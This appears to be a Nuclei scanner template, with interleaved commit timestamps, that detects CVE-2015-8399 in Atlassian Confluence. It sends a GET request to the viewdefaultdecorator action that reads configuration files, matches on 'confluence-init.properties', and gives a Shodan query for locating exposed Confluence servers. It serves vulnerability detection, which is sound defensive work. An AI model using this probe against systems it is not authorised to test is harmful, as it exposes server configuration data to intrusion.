2021-04-06 19:37:06 +00:00
id : CVE-2015-8399
2022-03-19 10:42:08 +00:00
2021-04-06 19:37:06 +00:00
info :
name : Atlassian Confluence configuration files read
2022-04-22 10:38:41 +00:00
author : princechaddha
2021-04-06 19:37:06 +00:00
severity : medium
description : Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
2022-04-22 10:38:41 +00:00
reference :
- https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/39170/
- http://www.securityfocus.com/archive/1/537232/100/0/threaded
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2015-8399
cwe-id : CWE-200
2022-03-19 10:42:08 +00:00
metadata :
shodan-query : http.component:"Atlassian Confluence"
tags : cve,cve2015,atlassian,confluence
2021-04-06 19:37:06 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"
2022-03-19 10:42:08 +00:00
2021-04-06 19:37:06 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
2022-03-19 10:42:08 +00:00
part : body
2021-04-06 19:37:06 +00:00
words :
- "confluence-init.properties"
- "View Default Decorator"
condition : and